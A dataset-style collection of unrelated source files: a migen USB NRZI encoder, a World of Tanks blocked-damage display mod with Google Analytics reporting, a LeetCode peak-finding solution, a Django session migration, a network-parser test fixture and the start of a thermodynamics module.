https://www.pjrc.com/teensy/beta/usb20.pdf, USB2 Spec, 7.1.8
https://en.wikipedia.org/wiki/Non-return-to-zero
Clock Domain
------------
usb_48 : 48MHz
Input Ports
-----------
i_valid : Signal(1)
Qualifies oe, data, and se0.
i_oe : Signal(1)
Indicates that the transmit pipeline should be driving USB.
i_data : Signal(1)
Data bit to be transmitted on USB. Qualified by o_valid.
i_se0 : Signal(1)
Overrides value of o_data when asserted and indicates that SE0 state
should be asserted on USB. Qualified by o_valid.
Output Ports
------------
o_usbp : Signal(1)
Raw value of USB+ line.
o_usbn : Signal(1)
Raw value of USB- line.
o_oe : Signal(1)
When asserted it indicates that the tx pipeline should be driving USB.
"""
def __init__(self):
self.i_valid = Signal()
self.i_oe = Signal()
self.i_data = Signal()
# Simple state machine to perform NRZI encoding.
self.submodules.nrzi = nrzi = FSM()
usbp = Signal(1)
usbn = Signal(1)
oe = Signal(1)
# wait for new packet to start
nrzi.act("IDLE",
usbp.eq(1),
usbn.eq(0),
oe.eq(0),
If(self.i_valid,
If(self.i_oe,
# first bit of sync always forces a transition, we idle
# in J so the first output bit is K.
NextState("DK")
)
)
)
# the output line is in state J
nrzi.act("DJ",
usbp.eq(1),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
If(~self.i_oe,
NextState("SE0A")
).Elif(self.i_data,
NextState("DJ")
).Else(
NextState("DK")
)
)
)
# the output line is in state K
nrzi.act("DK",
usbp.eq(0),
usbn.eq(1),
oe.eq(1),
If(self.i_valid,
If(~self.i_oe,
NextState("SE0A")
).Elif(self.i_data,
NextState("DK")
).Else(
NextState("DJ")
)
)
)
# first bit of the SE0 state
nrzi.act("SE0A",
usbp.eq(0),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
NextState("SE0B")
)
)
# second bit of the SE0 state
nrzi.act("SE0B",
usbp.eq(0),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
NextState("EOPJ")
)
)
# drive the bus back to J before relinquishing control
nrzi.act("EOPJ",
usbp.eq(1),
usbn.eq(0),
oe.eq(1),
If(self.i_valid,
NextState("IDLE")
)
)
# flop all outputs
self.o_usbp = Signal(1)
self.o_usbn = Signal(1)
self.o_oe = Signal(1)
self.sync += [
self.o_oe.eq(oe),
self.o_usbp.eq(usbp),
self.o_usbn.eq(usbn),
]
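# --- Hedged simulation sketch (not part of the original valentyusb module):
# drives the encoder with a short, arbitrary bit pattern using migen's
# run_simulation (expected to be available via the `from migen import *`
# above). Because of the relative imports at the top, run it with package
# context, e.g. `python -m valentyusb.usbcore.tx.nrzi`.
if __name__ == '__main__':
    def stimulus(dut):
        yield dut.i_valid.eq(1)
        yield dut.i_oe.eq(1)
        for bit in [0, 1, 1, 0, 1]:
            yield dut.i_data.eq(bit)
            yield
            print('usbp/usbn/oe:', (yield dut.o_usbp), (yield dut.o_usbn), (yield dut.o_oe))

    dut = TxNRZIEncoder()
    run_simulation(dut, stimulus(dut))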
|
.deprecated/mod_armoring_extended/mod_armoring_extended203.py
|
angelsoft1/spoter-mods
| 150 |
123044
|
<reponame>angelsoft1/spoter-mods<gh_stars>100-1000
# -*- coding: utf-8 -*-
import datetime
import re
import random
import string
import os
import json
import codecs
import urllib2
import urllib
import threading
import weakref
from functools import partial
import BigWorld
import Math
import GUI
import Keys
import game
from constants import AUTH_REALM, VEHICLE_HIT_EFFECT
from gui import InputHandler, g_guiResetters
from gui.Scaleform import Minimap
from gui.Scaleform.Flash import Flash
from gui.Scaleform.Battle import Battle
from gui.Scaleform.daapi.view.lobby.hangar import Hangar
from Vehicle import Vehicle
from VehicleEffects import DamageFromShotDecoder
from gui.app_loader import g_appLoader
class Config(object):
def __init__(self):
self.enable = True
self.debug = False
self.ru = True if AUTH_REALM == 'RU' else False
self.version = 'v2.03(30.08.2015)'
self.author = 'by spoter, reven86'
self.description = 'armoring_extended'
self.name = 'armoring_extended'
self.description_analytics = 'Мод: "Броняня"'
self.description_ru = 'Мод: "Броняня"'
self.author_ru = 'авторы: spoter, reven86'
self.tid = 'UA-57975916-9'
self.setup = {'MODIFIER': {'MODIFIER_NONE': 0, 'MODIFIER_SHIFT': 1, 'MODIFIER_CTRL': 2, 'MODIFIER_ALT': 4}}
self.sys_mes = {}
self._thread_analytics = None
self.analytics_started = False
self.language = None
self.xvm_installed = False
self.xvm_check()
self.res_mods = self.res_mods_init()
self.data = {}
self.default_config()
new_config = self.load_json(self.name, self.data)
self.data = new_config
if 'Русский' in self.data['config'].get('language'): self.ru = True
if self.ru:
self.description = self.description_ru
self.author = self.author_ru
@staticmethod
def res_mods_init():
wd = os.path.dirname(os.path.realpath(__file__))
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
return wd
def xvm_check(self):
try:
#
import xvm_main
self.xvm_installed = True
except StandardError:
pass
def default_config(self):
self.data = {
'config': {
'enable': True, 'debug': False, 'activate_message': True, 'only_HeavyTank': False, 'language': 'Русский'
}, 'language': {
'Русский': {
'main_text': 'Танканул <font color="#fdf498">{NumDmg}</font> раз(а) на <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" '
'vspace="-3" /><font color="#fdf498">{AvgDmg}</font> урона', 'activate_message': 'Броняня: Активирована',
'activate_message_only_HeavyTank': 'Броняня: Активирована, режим ТТ'
}, 'English': {
'main_text': '<font color="#fdf498">{NumDmg}</font> Blocked <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" vspace="-3" '
'/><font color="#fdf498">{AvgDmg}</font> damage', 'activate_message': 'Armoring Extended: Activated',
'activate_message_only_HeavyTank': 'Armoring Extended: Activated, only Heavy Tanks'
}, 'Deutsch': {
'main_text': '<font color="#fdf498">{NumDmg}</font> Blocked <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" vspace="-3" '
'/><font color="#fdf498">{AvgDmg}</font> Schaden', 'activate_message': 'Armoring Extended: Aktiviert',
'activate_message_only_HeavyTank': 'Armoring Extended: Aktiviert, nur schwere Panzer'
}
}, 'flash': {
'text': {
'x': 20, 'y': 450, 'alignX': 'left', 'alignY': 'top', 'default_font': '$IMELanguageBar', 'default_font_size': 14, 'default_font_color': '#BDFA64'
}, 'background': {
'enable': False, 'image': 'img://../res_mods/configs/spoter_mods/%s/background.png' % self.name, 'x': 18, 'y': 448, 'width': 250, 'height': 27, 'alpha': 80
}, 'shadow': {
'enable': True, 'distance': 0, 'angle': 0, 'color': '#000000', 'alpha': 60, 'size': 40, 'strength': 500
}
}
}
def do_config(self):
self.enable = self.data['config'].get('enable', False)
self.debug = self.data['config'].get('debug', False)
if self.data['config'].get('language') in self.data['language']:
self.language = self.data['language'].get(self.data['config'].get('language'))
else:
self.data['config']['language'] = 'English'
self.language = self.data['language'].get('English')
if armor.flash:
text = self.data['flash'].get('text')
background = self.data['flash'].get('background')
shadow = self.data['flash'].get('shadow')
if text:
armor.flash.data.set_text_config(text.get('x', 0), text.get('y', 0), text.get('alignX', 'left'), text.get('alignY', 'top'), text.get('default_font', '$IMELanguageBar'),
text.get('default_font_size', 14), text.get('default_font_color', '#BDFA64'))
if background:
armor.flash.data.set_background_config(background.get('enable'), background.get('image'), background.get('x'), background.get('y'), background.get('width'), background.get('height'),
background.get('alpha'))
if shadow:
armor.flash.data.set_shadow_config(shadow.get('enable'), shadow.get('distance'), shadow.get('angle'), shadow.get('color'), shadow.get('alpha'), shadow.get('size'),
shadow.get('strength'))
def update_cord(self, text_x, text_y, back_x, back_y):
flash = self.data['flash']
text = flash.get('text')
background = flash.get('background')
text['x'] = text_x
text['y'] = text_y
background['x'] = back_x
background['y'] = back_y
def byte_ify(self, inputs):
if inputs:
if isinstance(inputs, dict):
return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
elif isinstance(inputs, list):
return [self.byte_ify(element) for element in inputs]
elif isinstance(inputs, unicode):
return inputs.encode('utf-8')
else:
return inputs
return inputs
@staticmethod
def json_comments(text):
regex = r'\s*(#|\/{2}).*$'
regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
lines = text.split('\n')
excluded = []
for index, line in enumerate(lines):
if re.search(regex, line):
if re.search(r'^' + regex, line, re.IGNORECASE):
excluded.append(lines[index])
elif re.search(regex_inline, line):
lines[index] = re.sub(regex_inline, r'\1', line)
for line in excluded:
lines.remove(line)
return '\n'.join(lines)
def load_json(self, name, config_old, save=False):
config_new = config_old
path = './res_mods/configs/spoter_mods/%s/' % self.name
if not os.path.exists(path):
os.makedirs(path)
new_path = '%s%s.json' % (path, name)
if save:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
else:
if os.path.isfile(new_path):
try:
with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
data = self.json_comments(json_file.read().decode('utf-8-sig'))
config_new = self.byte_ify(json.loads(data))
json_file.close()
except Exception as e:
self.sys_mess()
print '%s%s' % (self.sys_mes['ERROR'], e)
else:
self.sys_mess()
print '%s[%s, %s %s]' % (self.sys_mes['ERROR'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG'])
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG_DONE'])
return config_new
@staticmethod
def code_pa(text):
try:
return text.encode('windows-1251')
except StandardError:
return text
def debugs(self, text):
if self.debug:
try:
text = text.encode('windows-1251')
except StandardError:
pass
print '%s%s [%s]: %s' % (datetime.datetime.now(), self.sys_mes['DEBUG'], self.code_pa(self.description), text)
def analytics_do(self):
if not self.analytics_started:
player = BigWorld.player()
param = urllib.urlencode({
'v': 1, # Version.
'tid': '%s' % self.tid, # Tracking ID / Property ID.
'cid': player.databaseID, # Anonymous Client ID.
't': 'screenview', # Screenview hit type.
'an': '%s' % self.description_analytics, # App name.
'av': '%s %s' % (self.description_analytics, self.version), # App version.
'cd': 'start [%s]' % AUTH_REALM # Screen name / content description.
})
self.debugs('http://www.google-analytics.com/collect?%s' % param)
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
def analytics(self):
self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
self._thread_analytics.start()
def sys_mess(self):
self.sys_mes = {
'DEBUG': '[DEBUG]', 'LOAD_MOD': self.code_pa('[ЗАГРУЗКА]: ') if self.ru else '[LOAD_MOD]: ', 'INFO': self.code_pa('[ИНФО]: ') if self.ru else '[INFO]: ',
'ERROR': self.code_pa('[ОШИБКА]: ') if self.ru else '[ERROR]: ',
'MSG_RECREATE_CONFIG': self.code_pa('конфиг не найден, создаем заново') if self.ru else 'Config not found, recreating',
'MSG_RECREATE_CONFIG_DONE': self.code_pa('конфиг создан УСПЕШНО') if self.ru else 'Config recreating DONE',
'MSG_INIT': self.code_pa('применение настроек...') if self.ru else 'initialized ...', 'MSG_LANGUAGE_SET': self.code_pa('Выбран язык:') if self.ru else 'Language set to:',
'MSG_DISABLED': self.code_pa('отключен ...') if self.ru else 'disabled ...'
}
def load_mod(self):
self.do_config()
self.sys_mess()
print ''
print '%s[%s, %s]' % (self.sys_mes['LOAD_MOD'], self.code_pa(self.description), self.code_pa(self.author))
if self.enable:
self.debugs('Debug Activated ...')
print '%s[%s %s %s...]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.sys_mes['MSG_LANGUAGE_SET'], self.code_pa(self.data['config'].get('language')))
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_INIT'])
else:
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_DISABLED'])
print ''
def save_config_debug(self):
new_config = self.load_json('armoring_extended', self.data, True)
self.data = new_config
self.do_config()
def load_config_debug(self):
new_config = self.load_json('armoring_extended', self.data)
self.data = new_config
self.do_config()
if armor:
armor.shout_damage()
class TextFlash(Flash):
def __init__(self, parent_ui, flash_name):
Flash.__init__(self, flash_name)
self.parentUI = parent_ui
self.isVisible = False
self.movie.backgroundAlpha = 0.0
self.component.wg_inputKeyMode = 2
self.component.position.z = 0.5
self.component.focus = False
self.component.moveFocus = False
self.component.heightMode = 'PIXEL'
self.component.widthMode = 'PIXEL'
self.flashSize = GUI.screenResolution()
self.text = {}
self.shadow = {}
self.background = {}
def start(self):
self.active(True)
self.visible_view(True)
self.component.visible = False
self.set_def_config()
self.update_pos()
def set_def_config(self):
text = config.data['flash'].get('text')
background = config.data['flash'].get('background')
shadow = config.data['flash'].get('shadow')
self.text['x'] = text['x']
self.text['y'] = text['y']
self.text['alignX'] = text['alignX']
self.text['alignY'] = text['alignY']
self.text['default_font'] = text['default_font']
self.text['default_font_size'] = text['default_font_size']
self.text['default_font_color'] = text['default_font_color']
self.background['enable'] = background['enable']
self.background['image'] = background['image']
self.background['x'] = background['x']
self.background['y'] = background['y']
self.background['width'] = background['width']
self.background['height'] = background['height']
self.background['alpha'] = background['alpha']
self.shadow['enable'] = shadow['enable']
self.shadow['distance'] = shadow['distance']
self.shadow['angle'] = shadow['angle']
self.shadow['color'] = shadow['color']
self.shadow['alpha'] = shadow['alpha']
self.shadow['size'] = shadow['size']
self.shadow['strength'] = shadow['strength']
def set_text_config(self, x=None, y=None, align_x=None, align_y=None, default_font=None, default_font_size=None, default_font_color=None):
if x is not None: self.text['x'] = int(x)
if y is not None: self.text['y'] = int(y)
if align_x is not None: self.text['alignX'] = '%s' % align_x
if align_y is not None: self.text['alignY'] = '%s' % align_y
if default_font is not None: self.text['default_font'] = '%s' % default_font
if default_font_size is not None: self.text['default_font_size'] = int(default_font_size)
if default_font_color is not None: self.text['default_font_color'] = '%s' % default_font_color
def set_background_config(self, enable=None, image=None, x=None, y=None, width=None, height=None, alpha=None):
if enable is not None: self.background['enable'] = enable
if image is not None: self.background['image'] = '%s' % image
if x is not None: self.background['x'] = int(x)
if y is not None: self.background['y'] = int(y)
if width is not None: self.background['width'] = int(width)
if height is not None: self.background['height'] = int(height)
if alpha is not None: self.background['alpha'] = int(alpha)
def set_shadow_config(self, enable=None, distance_shadow=None, angle_shadow=None, color_shadow=None, alpha_shadow=None, size_shadow=None, strength_shadow=None):
if enable is not None: self.shadow['enable'] = enable
if distance_shadow is not None: self.shadow['distance'] = int(distance_shadow)
if angle_shadow is not None: self.shadow['angle'] = int(angle_shadow)
if color_shadow is not None: self.shadow['color'] = '%s' % color_shadow
if alpha_shadow is not None: self.shadow['alpha'] = int(alpha_shadow)
if size_shadow is not None: self.shadow['size'] = int(size_shadow)
if strength_shadow is not None: self.shadow['strength'] = int(strength_shadow)
def destroy(self):
self.close()
def visible_view(self, boole):
self.isVisible = boole
self.component.visible = boole
def visible_tab(self, event):
isdown, key, mods, is_repeat = game.convertKeyEvent(event)
if not is_repeat and key == 15:
boole = not isdown if self.isVisible else False
self.component.visible = boole
def update_pos_debug(self, mod_x, mod_y):
self.text['x'] += mod_x
self.text['y'] += mod_y
self.background['x'] += mod_x
self.background['y'] += mod_y
def update_pos(self):
screen_gui = GUI.screenResolution()
screen_x = {'left': 0, 'center': screen_gui[0] / 2, 'right': screen_gui[0]}
screen_y = {'top': 0, 'center': screen_gui[1] / 2, 'bottom': screen_gui[1]}
if self.text['x'] + 10 > screen_gui[0]: self.text['x'] = screen_gui[0] - 10
if self.text['y'] + 10 > screen_gui[1]: self.text['y'] = screen_gui[1] - 10
x = self.text['x']
y = self.text['y']
align_x = self.text['alignX']
align_y = self.text['alignY']
elem_x = x + screen_x.get(align_x, 0)
elem_y = y + screen_y.get(align_y, 0)
self.set_position(elem_x, elem_y)
if self.background['x'] + 10 > screen_gui[0]: self.background['x'] = screen_gui[0] - 10
if self.background['y'] + 10 > screen_gui[1]: self.background['y'] = screen_gui[1] - 10
if self.background['enable']:
self.set_bg(self.background['image'], self.background['x'], self.background['y'], self.background['width'], self.background['height'], self.background['alpha'])
else:
self.set_bg(None, 0, 0, 0, 0, 0)
config.update_cord(self.text['x'], self.text['y'], self.background['x'], self.background['y'])
def set_position(self, pos_x, pos_y):
self.flash_call('setPosition', [pos_x, pos_y])
def set_visible(self, boole):
self.flash_call('setVisible', [boole])
def set_alpha(self, alpha):
self.flash_call('setAlpha', [alpha])
def set_shadow(self, distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow):
self.flash_call('setShadow', [distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow])
def set_bg(self, image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg):
self.flash_call('setBG', [image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg])
def set_text_flash(self, text):
text = '<font size="%s" face="%s" color="%s" >%s</font>' % (self.text['default_font_size'], self.text['default_font'], self.text['default_font_color'], text)
self.flash_call('setText', [text])
def set_text(self, text):
if self.isVisible:
self.component.visible = True
self.set_text_flash(text)
if self.shadow['enable']:
self.set_shadow(self.shadow['distance'], self.shadow['angle'], self.shadow['color'], self.shadow['alpha'], self.shadow['size'], self.shadow['strength'])
else:
self.set_shadow(0, 0, '#000000', 0, 0, 0)
def flash_call(self, func_name, args=None):
self.call('TextFlash.' + func_name, args)
class CustomFlash(object):
def __init__(self, flash_name):
self.data = TextFlash(weakref.proxy(self), flash_name)
class ArmoringExtended(object):
def __init__(self):
self.on_off = False
self.flash = None
self.num = 0
self.avgDMG = 0
self.SumAvgDmg = 0
self.list = {}
self.shots = 0
def cleanup_battle_data(self):
self.num = 0
self.avgDMG = 0
self.SumAvgDmg = 0
self.list = {}
self.shots = 0
@staticmethod
def message():
app = g_appLoader.getDefBattleApp()
if config.data['config'].get('only_HeavyTank'):
app.call('battle.PlayerMessagesPanel.ShowMessage',
[config.language['activate_message_only_HeavyTank'] + random.choice(string.ascii_letters), config.language['activate_message_only_HeavyTank'].decode('utf-8-sig'), 'gold'])
else:
app.call('battle.PlayerMessagesPanel.ShowMessage',
[config.language['activate_message'] + random.choice(string.ascii_letters), config.language['activate_message'].decode('utf-8-sig'), 'gold'])
def start_battle(self):
if not config.enable: return
if config.data['config'].get('only_HeavyTank'):
if 'heavyTank' in BigWorld.player().vehicleTypeDescriptor.type.tags:
self.on_off = True
else: self.on_off = True
if config.data['config'].get('activate_message') and self.on_off:
BigWorld.callback(5.0, self.message)
BigWorld.callback(5.0, self.shout_damage)
def clear_data(self):
self.avgDMG = 0
@staticmethod
def blocked_armor_hit(vehicle, decode_comp_name):
can_hit_primary_armor = None
comp_matrix = Math.Matrix(vehicle.appearance.modelsDesc[decode_comp_name.componentName]['model'].matrix)
first_hit_dir_local = decode_comp_name.matrix.applyToAxis(2)
first_hit_dir = comp_matrix.applyVector(first_hit_dir_local)
first_hit_point = decode_comp_name.matrix.translation
first_hit_pos = comp_matrix.applyPoint(first_hit_point)
world_to_veh_matrix = Math.Matrix(vehicle.model.matrix)
world_to_veh_matrix.invert()
start_point = world_to_veh_matrix.applyPoint(first_hit_pos - first_hit_dir)
end_point = world_to_veh_matrix.applyPoint(first_hit_pos + first_hit_dir.scale(10.0))
for compDescr, comp_matrix, isAttached in vehicle.getComponents():
if not isAttached: continue
collisions = compDescr['hitTester'].localHitTest(comp_matrix.applyPoint(start_point), comp_matrix.applyPoint(end_point))
if collisions is None: continue
for dist, _, hitAngleCos, matKind in collisions:
mat_info = compDescr['materials'].get(matKind)
can_hit_primary_armor = True if mat_info is not None and mat_info.useArmorHomogenization else False
if can_hit_primary_armor: break
if can_hit_primary_armor: break
return can_hit_primary_armor
def shout_damage(self):
if self.avgDMG != 0:
self.num += 1
self.SumAvgDmg += self.avgDMG
format_str = {'NumDmg': BigWorld.wg_getIntegralFormat(self.num), 'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)}
self.flash.data.set_text(config.language['main_text'].format(**format_str))
self.clear_data()
def shout_damage_hp(self, shots):
if self.list[shots]:
if self.list[shots]['isDamage']:
self.list[shots] = None
return
if self.list[shots]['avgDMG'] != 0:
self.num += 1
self.SumAvgDmg += self.list[shots]['avgDMG']
format_str = {'NumDmg': BigWorld.wg_getIntegralFormat(self.num), 'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)}
self.flash.data.set_text(config.language['main_text'].format(**format_str))
self.list[shots] = None
def shot(self, vehicle, attacker_id, points, effects_index):
if not (config.enable and self.on_off): return
if not vehicle.isStarted: return
if not vehicle.isPlayer: return
if BigWorld.player().team == BigWorld.player().arena.vehicles.get(attacker_id)['team']: return
if vehicle.health < 1: return
self.shots += 1
index_hit, decode_comp_name = DamageFromShotDecoder.decodeHitPoints(points, vehicle.typeDescriptor)
#compName = decode_comp_name[0].componentName if decode_comp_name else None
has_pierced_hit = index_hit >= VEHICLE_HIT_EFFECT.ARMOR_PIERCED
is_blocked = self.blocked_armor_hit(vehicle, decode_comp_name[0]) if decode_comp_name else False
if is_blocked:
for shell in BigWorld.player().arena.vehicles.get(attacker_id)['vehicleType'].gun['shots']:
if effects_index == shell['shell']['effectsIndex']:
type_shell = shell['shell']['kind']
if type_shell != 'HIGH_EXPLOSIVE':
self.avgDMG, _ = shell['shell']['damage']
if has_pierced_hit:
self.list[self.shots] = {'id': attacker_id, 'avgDMG': self.avgDMG, 'isDamage': False, 'used': False}
BigWorld.callback(0.15, partial(self.shout_damage_hp, self.shots))
else: self.shout_damage()
break
else: self.clear_data()
def heal(self, vehicle, new_health, attacker_id):
if not (config.enable and self.on_off): return
if not vehicle.isStarted or not vehicle.isPlayer: return
is_damage = max(0, new_health)
if is_damage:
for shots in self.list:
if self.list[shots] and 'id' in self.list[shots] and self.list[shots]['id'] == attacker_id and not self.list[shots]['used']:
self.list[shots]['isDamage'] = True
self.list[shots]['used'] = True
break
# deformed functions:
def hook_show_all(self_battle, old_hooked_show_all, is_show):
old_hooked_show_all(self_battle, is_show)
if config.enable:
if armor.flash is None: return
armor.flash.data.visible_view(is_show)
def hook_after_create(self):
hooked_afterCreate(self)
if config.enable:
armor.flash = CustomFlash('%s.swf' % config.name)
armor.flash.data.start()
g_guiResetters.add(armor.flash.data.update_pos)
config.do_config()
armor.cleanup_battle_data()
def hook_before_delete(self):
hooked_beforeDelete(self)
if config.enable:
armor.cleanup_battle_data()
if armor.flash is None: return
armor.flash.data.destroy()
g_guiResetters.discard(armor.flash.data.update_pos)
armor.flash.data = None
armor.flash = None
def hook_update_all(self):
hooked_update_all(self)
config.analytics()
def inject_handle_key_event(event):
if config.enable:
is_down, key, mods, is_repeat = game.convertKeyEvent(event)
if config.debug and armor.flash:
if key == Keys.KEY_NUMPAD6 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(10, 0)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change x +10'
if key == Keys.KEY_NUMPAD4 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(-10, 0)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change x -10'
if key == Keys.KEY_NUMPAD8 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(0, -10)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change y -10'
if key == Keys.KEY_NUMPAD2 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(0, 10)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change y +10'
if key == Keys.KEY_NUMPADMINUS and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
config.load_config_debug()
armor.flash.data.update_pos()
print 'config reloaded'
def hook_vehicle_show_damage_from_shot(self, attacker_id, points, effects_index):
hooked_vehicle_show_damage_from_shot(self, attacker_id, points, effects_index)
if armor.on_off:
armor.shot(self, attacker_id, points, effects_index)
def hook_vehicle_on_health_changed(self, new_health, attacker_id, attack_reason_id):
hooked_vehicle_on_health_changed(self, new_health, attacker_id, attack_reason_id)
if armor.on_off:
armor.heal(self, new_health, attacker_id)
def hook_minimap_start(self):
hooked_minimap_start(self)
armor.start_battle()
#start mod
armor = ArmoringExtended()
config = Config()
config.load_mod()
#hooked
hooked_show_all = Battle.showAll
hooked_afterCreate = Battle.afterCreate
hooked_beforeDelete = Battle.beforeDelete
# noinspection PyProtectedMember
hooked_update_all = Hangar._Hangar__updateAll
hooked_vehicle_show_damage_from_shot = Vehicle.showDamageFromShot
hooked_vehicle_on_health_changed = Vehicle.onHealthChanged
hooked_minimap_start = Minimap.Minimap.start
#hook
Battle.showAll = lambda self_battle, is_show: hook_show_all(self_battle, hooked_show_all, is_show)
Battle.afterCreate = hook_after_create
Battle.beforeDelete = hook_before_delete
# noinspection PyProtectedMember
Hangar._Hangar__updateAll = hook_update_all
Vehicle.showDamageFromShot = hook_vehicle_show_damage_from_shot
Vehicle.onHealthChanged = hook_vehicle_on_health_changed
Minimap.Minimap.start = hook_minimap_start
#Inject
InputHandler.g_instance.onKeyDown += inject_handle_key_event
InputHandler.g_instance.onKeyUp += inject_handle_key_event
|
Codes/gracekoo/162_find-peak-element.py
|
liuxiaohui1221/algorithm
| 256 |
123056
|
# -*- coding: utf-8 -*-
# @Time: 2020/4/27 12:46
# @Author: GraceKoo
# @File: 162_find-peak-element.py
# @Desc: https://leetcode-cn.com/problems/find-peak-element/
from typing import List
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
left = 0
right = len(nums) - 1
while left < right:
middle = (left + right) // 2
            # search for the peak in the left half (including middle)
if nums[middle] > nums[middle + 1]:
right = middle
# 从middle右侧开始找峰值
else:
left = middle + 1
return left
so = Solution()
print(so.findPeakElement([1, 2, 1, 3, 5, 6, 4]))
|
auth/migrations/0001_initial.py
|
ujlbu4/vas3k.club
| 496 |
123063
|
<filename>auth/migrations/0001_initial.py
# Generated by Django 3.0.4 on 2020-04-08 10:09
import uuid
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Apps',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.CharField(max_length=64, unique=True)),
('secret_key', models.CharField(max_length=128, unique=True)),
('app_key', models.CharField(max_length=256, unique=True)),
('redirect_urls', models.TextField()),
],
options={
'db_table': 'apps',
},
),
migrations.CreateModel(
name='Session',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('token', models.CharField(db_index=True, max_length=128, unique=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('expires_at', models.DateTimeField(null=True)),
('app', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='auth.Apps')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='users.User')),
],
options={
'db_table': 'sessions',
},
),
]
|
src/genie/libs/parser/iosxe/tests/ShowAuthenticationSessionsInterfaceDetails/cli/equal/golden_output_10_expected.py
|
balmasea/genieparser
| 204 |
123078
|
<reponame>balmasea/genieparser
expected_output = {
"interfaces": {
"GigabitEthernet1/0/17": {
"mac_address": {
"0024.9bff.0ac8": {
"acct_session_id": "0x0000008d",
"common_session_id": "0A8628020000007168945FE6",
"current_policy": "Test_DOT1X-DEFAULT_V1",
"domain": "DATA",
"handle": "0x86000067",
"iif_id": "0x1534B4E2",
"ipv4_address": "Unknown",
"ipv6_address": "Unknown",
"user_name": "host/Laptop123.test.com",
"status": "Authorized",
"oper_host_mode": "multi-auth",
"oper_control_dir": "both",
"session_timeout": {"type": "N/A"},
"server_policies": {
1: {
"name": "ACS ACL",
"policies": "xACSACLx-IP-Test_ACL_PERMIT_ALL-565bad69",
"security_policy": "None",
"security_status": "Link Unsecured",
}
},
"method_status": {
"dot1x": {"method": "dot1x", "state": "Authc Success"},
"mab": {"method": "mab", "state": "Stopped"},
},
}
}
}
}
}
|
thermo/phases/virial_phase.py
|
RoryKurek/thermo
| 380 |
123084
|
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2019, 2020 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
__all__ = ['VirialCorrelationsPitzerCurl', 'VirialGas']
from fluids.numerics import newton
from chemicals.utils import log
